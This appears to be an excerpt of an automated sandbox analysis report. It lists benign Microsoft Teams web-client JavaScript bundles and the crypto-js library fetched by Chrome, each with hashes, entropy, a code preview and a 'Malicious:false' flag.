                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/async-entry-30ceeed1b130572d.js?cb=1733248788947
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805610],{211014:(e,t,n)=>{"use strict";n.d(t,{b:()=>i});const i=(0,n(965804).O)({isStudentAvatar:{Bf4jedk:"f1ohpo60"},isParentAvatar:{Bf4jedk:"ff9fk16"}})},516404:(e,t,n)=>{"use strict";function i(e){return'<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>','<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>'}n.d(t,{A:()=>i})},10247:(e,t,n)=>{"use strict";function i(e){var t="";Array.prototype.join;return t+="<style>\n .preload-title-bar-trim {\n ","mac"===e.osPlatform?t+="\n --preload-title-bar-background-color: rgb(98, 100, 167);\n ":t+="\n --preload-title-bar-background-color: rgb(70, 71, 117);\n ",t+='\n\n background-color: var(--preload-title-bar-bac
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):73015
                                                                                                                                                                                                                                                                            Entropy (8bit):5.301651481165213
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:hrYXUP+dcYtaNHGuq+WMcfELOn+qfZ3EQ00L5XkkiE46+Hdvz//oGSRcQN:pYXU2GZx5yJnzLlX6RARcQ
                                                                                                                                                                                                                                                                            MD5:301B9C2ED60017E2237E812DBAF59933
                                                                                                                                                                                                                                                                            SHA1:3ACCE8E7A8E9B381FA31E59D03D38CEC33622758
                                                                                                                                                                                                                                                                            SHA-256:205DBDCD029381218CB78EB24ADCC072190D8B979A870CF80EC33FD82DCE6ED8
                                                                                                                                                                                                                                                                            SHA-512:DEAED496ADC8707B80549BB91F8A5CC1E1710D09AE984242B7853DD8ECD74B848E5CDB95CA6182DE95A8944F373E1C040909937B0D88FC39BBF2FED32FD976E6
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/492696-55b16e88aaa4fe43.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[492696],{589708:(e,t,a)=>{a.d(t,{j:()=>$});var r=a(802756),i=a(60214),o=a(625292),n=a(923226),s=a(848020),c=a(448211),d=a(510139),u=a(935008),l=a(366603),h=a(48410),g=a(191914),_=a(955262),m=a(417694),p=a(847431),S=a(703478);const A=(e,t)=>(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderLoadError,isExpected:!1,message:(0,d.Nw)(e),correlationId:t}),v=(e,t,a,r)=>{if(r?.("enablePostMessageAuthentication")&&t.hasPostMessageAgent){const t=e.postMessageConfig;if(!t)throw(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderLoadError,isExpected:!1,message:"When enabling post message based authentication, postMessageConfig must be provided in the experience configuration.",correlationId:a});if(0===t.length)throw(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderL
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):359671
                                                                                                                                                                                                                                                                            Entropy (8bit):5.9273502933188835
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:ma3lgT9L/vlE7eI2/bUKu1B5FrXUeg2fJyXytyTP37Th4Lyr:ma6L+7eI2/bUKu1rXQiJ6Cyj3faW
                                                                                                                                                                                                                                                                            MD5:7DBB1A2AF26D6799A367A5AB65A78D44
                                                                                                                                                                                                                                                                            SHA1:0DE0F024CE4D1A832E9571188EFC147BCF7938C6
                                                                                                                                                                                                                                                                            SHA-256:74590FD217950F46762E7BE03C68A09446A995F4A7DC4ED91E27FBE10E2F9757
                                                                                                                                                                                                                                                                            SHA-512:822BA52C3B718219A34B957D2A3C8342448F2B255E881FC13878ED4F4A4F99C1509F6041C43102BD19F24E8BE7751487AD98F8918569E9DECAA1061A5CB46FD2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:window.__teamsSriHashes = window.__teamsSriHashes || {};.Object.assign(window.__teamsSriHashes, {"253":"sha256-dCHiqHHbT8C54v6xkfBWJOlN4qDwMFHJpfWkbDSMY1I=","304":"sha256-1EHp3/t0hGPo3dZ0KSxFjRb9sJUAbs5LuulZRWj8fuc=","450":"sha256-ouv3RNGdmdsmy9N5iMOstCZXhW6f6KuOHbHWbPY8IkI=","555":"sha256-1XCNZ4M/VA/Cs3u4YVBW4RmTc7HQPJ1SgO9LNZDEvIE=","563":"sha256-OIwfU2nVSk61izw6PPlbs6uhn6vrbsahqPVRgpEY+yg=","757":"sha256-eE44F4pLVlEYadEsrIZ4vjkJu3/kIBCnXE70c464NfM=","785":"sha256-/9eS87EqHAeR7rqdzN0Sgnc69tvTQK23LlWT0IVjd0s=","818":"sha256-HRQfl5qrrNxSihawrKVl6appBIRSNE+LwsvSW1bgLNc=","906":"sha256-L5gEiGP2s/6usJyzymx28/OI554GDHRFFoa1Zgz27xg=","1079":"sha256-AJb1brTr1NgAtonwrQ7awmQGy7xZxCmmPEjtbTEtBXQ=","1081":"sha256-QV0RxKqJLIsxCyK/DlYEuPGD459atbpezw5s7F7ir0I=","1170":"sha256-JDhpHtZ6E4OzpC7AkARyf+KbMplq8nJfnZ64M4UwnSQ=","1214":"sha256-FIGgND7SkFJQs87te48T7KbVZ0x5hWUOQPRyJAWo5FU=","1258":"sha256-vZ+JBKqlmK8u03V/tfF86M7gAbjeFWbaZTfqTGaAquE=","1498":"sha256-6ulAN9dXJ1GtYDLYn80gVBfSZ5O6TSlZARpA2vs+8Qk
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65520), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):917934
                                                                                                                                                                                                                                                                            Entropy (8bit):4.809994849179831
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24576:BqNfbMPUhKSJeKHn9Wrf+wSKlgepvy4I+q:oNXJ7Wrf+wSKlbvy1+q
                                                                                                                                                                                                                                                                            MD5:A13556D95478DF3BA90F1EAD52F72118
                                                                                                                                                                                                                                                                            SHA1:6004D6DE85E383BD76FE027A5F5F017A0B20F6AC
                                                                                                                                                                                                                                                                            SHA-256:384AAA0556A1E8C567EA68F83E8A0F83ECAF06843F33EF57D824FCB2FD3218D8
                                                                                                                                                                                                                                                                            SHA-512:11B6BC4653405DD38FBE2B483E090609C481D53A6D5DAA040A0657BF1D21163B40BDB68B4969DB11768688BA5B7A6A55A5BDCC07309279FAEA5B0C184C691FD2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/main-locale-en-us-ca67599dc193ecbe.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[531106],{592150:(e,t,a)=>{a.r(t),a.d(t,{default:()=>o});const o={namespace:"activity",locale:"en-us",translations:{activity_app_name:"Activity",activity_contextual_settings_undo_button:"Undo",activity_esp_chat_recommendation_description:"Start a chat with a coworker or bring everyone together in a group chat",activity_esp_chat_recommendation_title:"Stay in touch using chat",activity_esp_contact_sync_confirmation_description:"Talk to anyone from your contact list.",activity_esp_contact_sync_confirmation_title:"Google contacts synced",activity_esp_files_recommendation_description:"Share all types of files like PDFs, documents or photos",activity_esp_files_recommendation_title:"Share and collaborate on files in chat",activity_esp_meeting_recommendation_description:"Try out meeting backgrounds, reactions, and more",activity_esp_meeting_recommendation_title:"Meet now or later",act
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1553)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1661
                                                                                                                                                                                                                                                                            Entropy (8bit):5.0225756013299625
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3MOpj9sc69uIIbBbdDAMR2ib/8MWAmKi0ts:Kg9scXDRMMQTKG
                                                                                                                                                                                                                                                                            MD5:36257721841A878FDC2BB0DEBF79AB4D
                                                                                                                                                                                                                                                                            SHA1:306BC380F6493BBCFA3DB3F22ED1F114DA25DE9A
                                                                                                                                                                                                                                                                            SHA-256:C646F166DA49CBE06D285A2A86B4E11B7E1DE5EDAD5A4A3626187B4B635E40E2
                                                                                                                                                                                                                                                                            SHA-512:6F2A5D922F8FCC25E20F8B52BE2F011346A7F1C452DC3C04F8120EA28545BB9A24DB99DA8DB7D25CF154DD6491188D500133358085917CA299BC422C723F96EF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[796156],{796156:(e,s,a)=>{a.d(s,{s:()=>n});var C=a(957032),t=a(395225),l=a.n(t),c=a(485529),i=a(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,C.Y)("svg",{role:"presentation",focusable:"false",viewBox:"0 0 18 18",className:l()(e.svg),children:[(0,C.Y)("path",{className:l()(i.Q.outline,e.outlinePart),d:"M18 4.8016C18 3.81605 17.0658 3.09831 16.1135 3.35225L3.11351 6.81891C2.45688 6.99402 2 7.58869 2 8.26827V10.7792C2 11.4249 2.41315 11.9981 3.02566 12.2023L5 12.8604V13.75C5 15.5449 6.45507 17 8.25 17C9.62112 17 10.7932 16.1513 11.2709 14.9507L16.0257 16.5356C16.997 16.8594 18 16.1364 18 15.1126V4.8016ZM10.32 14.6337C9.97657 15.437 9.17866 16 8.25 16C7.00736 16 6 14.9926 6 13.75V13.1937L10.32 14.6337ZM16.3712 4.31848C16.6886 4.23384 17 4.47309 17 4.8016V15.1126C17 15.4538 16.6657 15.6948 16.3419 15.5869L3.34189 11.2536C3.13771 11.1855 3 10.9944 3 10.7792V8.26827C3 8.04174 3.15
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9937)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):10044
                                                                                                                                                                                                                                                                            Entropy (8bit):5.444279096330454
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:1QgZfOfW6LKNLIDepX+gQ8LOapl1KzL16tnpA8Ckh9Hd+4keq4PBH4UGNfRoLyL8:tGrGhISpX+g3Bv4apvCkjdjDq4J471RM
                                                                                                                                                                                                                                                                            MD5:2B4C497D3F89CB23052BE40DA7B4FD82
                                                                                                                                                                                                                                                                            SHA1:D55BEF6FB11CBB81BD08144BA1A61DD2EBFEB5E6
                                                                                                                                                                                                                                                                            SHA-256:2DCCF9898681979FAB08FE15530549519F86519818E9154BFB74D4CC6F98B46E
                                                                                                                                                                                                                                                                            SHA-512:06960A5C1F31359E13B29A988751A60C928D8CE2AC854B5B0F36B220EF49B449E27B17D1AE4835F8A47CB8ED9EA8C0DB86C5F67B7C304A62B3FB32B2404F2A7F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[57627],{184027:(e,t,r)=>{r.d(t,{q:()=>o});var n=r(513432),a=r(691505),o=function(e){var t,r=n.createContext({value:{current:e},version:{current:-1},listeners:[]});return r.Provider=(t=r.Provider,function(e){var r=n.useRef(e.value),o=n.useRef(0),s=n.useRef();return s.current||(s.current={value:r,version:o,listeners:[]}),(0,a.E)((function(){r.current=e.value,o.current+=1,(0,a.H)((function(){s.current.listeners.forEach((function(t){t([o.current,e.value])}))}))}),[e.value]),n.createElement(t,{value:s.current},e.children)}),delete r.Consumer,r}},963300:(e,t,r)=>{r.d(t,{F:()=>s});var n=r(513432),a=r(691505),o=r(783943);const s=(e,t)=>{const r=n.useContext(e),{value:{current:s},version:{current:c},listeners:l}=r,i={};Object.keys(t).forEach((e=>{i[e]=t[e](s)}));const[u,d]=n.useState([s,i]),m=e=>{d((r=>{if(!e)return[s,i];if(e[0]<=c){return Object.keys(t).every((e=>Object.is(r[1][e],i[
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2208)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):2316
                                                                                                                                                                                                                                                                            Entropy (8bit):4.861015852238033
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3xv08PIo+iBj54nWJy5PIm7HjnhSJyVR0K5m:IqQiYWY+qHjhSYVR9Q
                                                                                                                                                                                                                                                                            MD5:8A95CDB621AC696E7DC73F945C5E028D
                                                                                                                                                                                                                                                                            SHA1:912AD9D60D0D78C8CBAFD355014EBBE714A162EE
                                                                                                                                                                                                                                                                            SHA-256:6A8270DB58C60E1C6B94EF0CF99FB2693EE00D6AA5FDC1D7CF3B5224935F3F9B
                                                                                                                                                                                                                                                                            SHA-512:FF88C3A0C969660D74F810B8E0CF56CA9780DD696ACDF86E007A4846763F02FAACFFE6447631F7F45612B2F106F82EC48E6E4A5521DB8266645A37679BB9F711
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/169767-cde234dc0bbb0b5b.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[169767],{169767:(e,C,t)=>{t.d(C,{d:()=>r});var a=t(513432),s=t(395225),l=t.n(s),c=t(485529),n=t(829289),r=(0,c.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:l()(n.Q.outline,C.outlinePart)},a.createElement("path",{d:"M9.51562 6C9.23948 6 9.01562 6.22386 9.01562 6.5C9.01562 6.77614 9.23948 7 9.51562 7H12.2929L8.14645 11.1464C7.95118 11.3417 7.95118 11.6583 8.14645 11.8536C8.34171 12.0488 8.65829 12.0488 8.85355 11.8536L13 7.70711V10.4844C13 10.7605 13.2239 10.9844 13.5 10.9844C13.7761 10.9844 14 10.7605 14 10.4844V6.5C14 6.22386 13.7761 6 13.5 6H9.51562ZM12.7656 17C14.0136 17 15.0481 16.0855 15.2354 14.8901C16.2572 14.5761 17 13.6248 17 12.5V5.5C17 4.11929 15.8807 3 14.5 3H7.5C6.36321 3 5.40363 3.75875 5.10007 4.79744C3.90947 4.98887 3 6.02104 3 7.26562
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):89204
                                                                                                                                                                                                                                                                            Entropy (8bit):5.238643135138433
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:gXrMjuTJeXV5/90Nhb149+K2LosaygogyNxzreZ1Wn8BQI0SswV8s+1ibC5YGhFH:vPIFqfhTImoe8
                                                                                                                                                                                                                                                                            MD5:C7C790EF3E88381F1826824457B17896
                                                                                                                                                                                                                                                                            SHA1:11563ADD5A4853D202CF9E434C8822CFA63A3099
                                                                                                                                                                                                                                                                            SHA-256:72A519327E14A14AE1811DD5682CBFE514B1FBB8203F612ED16B1E746A3F658B
                                                                                                                                                                                                                                                                            SHA-512:F85121808648A63E061C760225391133C2849D08DB9B97E07BC8169D325C0235CF72B5B631AF389F61286A7B4DAF5296F31554DF858A063ED7677495954CDFC4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[990536],{474977:(t,e,a)=>{a.d(e,{R:()=>m});var o=a(519485),i=a(364819),d=a(440320);class s{constructor(t){this.modifier="alt",this.keyMaps=[],this.originalKeyMaps=[],this.commandIdToAreaDescription=new Map,this.isVirtualStrategy=!1,this.keyMaps=[],this.addCommandIdToAreaDescription("ShowShortcuts",["Global"],"shortcut_show_shortcuts","General",!0),this.addCommandIdToAreaDescription("GoToPowerBar",["Global"],"shortcut_open_search","General",!0),this.addCommandIdToAreaDescription("NewChat",["Global"],"shortcut_compose_new","General",!0),this.addCommandIdToAreaDescription("PopoutNewChat",["Global"],"shortcut_pop_out_new_chat","General",t.enableShortcutToOpenNewChatInPopout),this.addCommandIdToAreaDescription("PopoutSelectedChat",["Global"],"shortcut_popout_selected_chat","General"),this.addCommandIdToAreaDescription("OpenLeftRailFilter",["Global"],"shortcut_open_left_rail_filter
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1103641
                                                                                                                                                                                                                                                                            Entropy (8bit):5.414214427513954
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12288:NDCLrQ4hYANZEwdT0FNm9/ECzZfHE110GgNPENBDl9xdzuMlW951c:cT9cCzM0GgNPENBDl/kbK
                                                                                                                                                                                                                                                                            MD5:194338E660C8E67A9C6E9A0F7919808F
                                                                                                                                                                                                                                                                            SHA1:6D3913E150505AB9AFE49B27218CA440B2C8941B
                                                                                                                                                                                                                                                                            SHA-256:8B9CA722D58B4602DAF336E06628316AF8457A989D83515FB4B696FFF5803EF0
                                                                                                                                                                                                                                                                            SHA-512:C783FFE4267ED436358CD01014CED3B2D3F9B4CA4E8A3D1BCC4F5D1F511D9434FE4A9C74D9842095E3D48D61FF0FCFA33D8B6235D740A8C648D96E1E485C248E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[426009],{937148:(e,a,t)=>{t.r(a),t.d(a,{default:()=>n});const n={configs:{auth:{enableAuthV2:[{value:!0}],enableMsal2:[{platform:[1454,1415],value:!0},{value:!0,platform:[1454,1415]}],caeEnabledResources:[{value:["https://api.spaces.skype.com","https://chatsvcagg.teams.microsoft.com","https://outlook.office.com","https://ic3.teams.office.com","sharepoint","presence"]}],criticalResources:[{platform:[50,51,49],value:["https://api.spaces.skype.com","https://chatsvcagg.teams.microsoft.com","https://ic3-non-cae.teams.office.com","https://ic3.teams.office.com","https://outlook.office.com/search","https://presence.teams.microsoft.com/","https://noam.presence.teams.microsoft.com/","https://emea.presence.teams.microsoft.com/","https://apac.presence.teams.microsoft.com/","https://presence.gcc.teams.microsoft.com/","https://noamdf.presence.teams.microsoft.com/"]},{value:["https://api.sp
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):36
                                                                                                                                                                                                                                                                            Entropy (8bit):4.503258334775644
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:Eq62iczBr9ks:EqdiczBys
                                                                                                                                                                                                                                                                            MD5:06B313E93DD76909460FBFC0CD98CB6B
                                                                                                                                                                                                                                                                            SHA1:C4F9B2BBD840A4328F85F54873C434336A193888
                                                                                                                                                                                                                                                                            SHA-256:B4532478707B495D0BB1C21C314AEF959DD1A5E0F66E52DAD5FC332C8B697CBA
                                                                                                                                                                                                                                                                            SHA-512:EFD7E8195D9C126883C71FED3EFEDE55916848B784F8434ED2677DF5004436F7EDE9F80277CB4675C4DEB8F243B2705A3806B412FAA8842E039E9DC467C11645
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                                                                                                                                                                                            Preview:ChgKDQ3RW1FSGgQIVhgCIAEKBw1Xevf9GgA=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18335)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):18444
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4219475958291286
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:S0xnbFFqEuCnA8oUWVZtpcpWq4si9exVHreCOLEJny:S0xnbFFqb8jqZtkxVHreCOLEJy
                                                                                                                                                                                                                                                                            MD5:D9EDC1D501F5631A7C4E7C37B1AC280A
                                                                                                                                                                                                                                                                            SHA1:CD94885FEFF710323427C8BAF5850F982FC22890
                                                                                                                                                                                                                                                                            SHA-256:1D60EF14C462EAC63FC9546DDEF168A9BF2F86DE4F148D8F253A0D96D284FB75
                                                                                                                                                                                                                                                                            SHA-512:9966A040C7C492ADCD0F13E7CF6369719A638ADCC80D9F6107038030E968E622C8E1DB74B9321D040450F5B2CB76187E31F4726D0149E52B665CF966A2C10CB0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/52196-c82deace0372cca0.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52196],{946187:(e,o,r)=>{r.d(o,{C:()=>t});const t={auto:"auto",belowBase:-1,base:0,overBase:1,topOfBase:2,belowSurfaces:3,surfaceMenu:1e3,backdrop:1e3,callout:1e3,tooltip:1010,searchBox:1010,searchBoxSurfaceMenu:1010,monitor:1e3,shell:1030}},742692:(e,o,r)=>{r.d(o,{PtS:()=>a});var t=r(693593);const a={borderColor:t.Pt.borderColor,borderStyle:t.Pt.borderStyle,borderWidth:t.Pt.borderWidth}},820152:(e,o,r)=>{r.d(o,{T:()=>t});const t={v9Icon:()=>({"& svg":{width:"100%",paddingBottom:"100%",margin:"-4px 0 0 -4px",overflow:"visible"},"& .fui-Icon-filled":{display:"none"},"& .fui-Icon-regular":{display:"inline"},"&:hover":{"& .fui-Icon-filled":{display:"inline"},"& .fui-Icon-regular":{display:"none"}}}),v9CustomSizeIcon:()=>({"& svg":{overflow:"visible"},"& .fui-Icon-filled":{display:"none"},"& .fui-Icon-regular":{display:"inline"},"&:hover":{"& .fui-Icon-filled":{display:"inline"},
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):515529
                                                                                                                                                                                                                                                                            Entropy (8bit):5.2538663457384
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:CPaFNMUHLAVxQ/1Dt91N6FGGaUasEhecD/BEKQo3kAZyRirCVg09Q:CC4a1DtWcg9Q
                                                                                                                                                                                                                                                                            MD5:DF02C7743B36BB93FE20CA9EF4BACDCF
                                                                                                                                                                                                                                                                            SHA1:C0C7F65F57F901E12E33CE9C313379BB466C1141
                                                                                                                                                                                                                                                                            SHA-256:BDD6237E623ACEDA1AC099EAED7DCB9EAF9013058419884787D9DDAEF95471BF
                                                                                                                                                                                                                                                                            SHA-512:EBE273C86C207152CD0FE472E0073C61275CD432317F3029301DAACB877425E2262D6991AF065E1F8152909999C3AFE9B4C60E897809A5F3728210FE58E66CE5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[771953],{327005:(e,t,i)=>{"use strict";i.d(t,{c:()=>o});var n=i(362328);const a={kind:"Document",get definitions(){const e=(0,n.G)("query ServicesIoDataCallingServiceAdaptersActivitySettingsQuery($appId:String!,$subCategoryPageId:String) {activitySettings(appId:$appId,subCategoryPageId:$subCategoryPageId) {id,error,settingsList {key,value}}}");return delete this.definitions,this.definitions=e.definitions}};var r=i(354776);const o=async e=>{const{data:t}=await e.query({query:a,fetchPolicy:"no-cache",variables:{appId:r.n5.Meetings,subCategoryPageId:r.n5.Meetings}});return t?.activitySettings?.settingsList}},230749:(e,t,i)=>{"use strict";i.d(t,{R:()=>ee});var n=i(332752),a=i(805809),r=i(724801),o=i(424096),l=i(364819),s=i(554186),c=i(194649),d=i(46377),g=i(2596),p=i(926751);const u={403:"Forbidden",404:"NotFound",409:"Conflict",500:"InternalServerError",400:"BadRequest",503:"ServiceUnavailab
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):47992
                                                                                                                                                                                                                                                                            Entropy (8bit):5.605846858683577
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                                                                                            MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                                                                                            SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                                                                                            SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                                                                                            SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (31284)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):31398
                                                                                                                                                                                                                                                                            Entropy (8bit):5.331482177569915
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ZTAybJiiyoHe8UQ68Ji799d0nx2+xFFQEeTRh9Y6DbP9A5ZtKDZrBShFCpXQ77iY:ZTz1iixHKNseDdvMOpXguY
                                                                                                                                                                                                                                                                            MD5:DBD079ED30F84ED4952EEE454733AE7D
                                                                                                                                                                                                                                                                            SHA1:E3753C11FA79C36DB8EAE043CC3DFBD66D8BAC85
                                                                                                                                                                                                                                                                            SHA-256:A93E1696D5BA2DF1A6B5D0A1B3FFCDDD2FF6E8E81B2E2531255B99F8DD852683
